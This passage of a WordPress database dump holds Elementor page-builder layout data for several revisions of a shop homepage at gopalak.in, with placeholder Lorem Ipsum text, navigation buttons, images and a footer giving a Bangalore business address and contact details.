here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8012,1421,'_elementor_page_assets','a:0:{}'),(8014,1422,'_elementor_edit_mode','builder'),(8015,1422,'_elementor_template_type','wp-page'),(8016,1422,'_elementor_version','3.7.6'),(8017,1422,'_wp_page_template','elementor_canvas'),(8018,1422,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8019,1422,'_elementor_page_assets','a:0:{}'),(8021,1423,'_elementor_edit_mode','builder'),(8022,1423,'_elementor_template_type','wp-page'),(8023,1423,'_elementor_version','3.7.6'),(8024,1423,'_wp_page_template','elementor_canvas'),(8025,1423,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"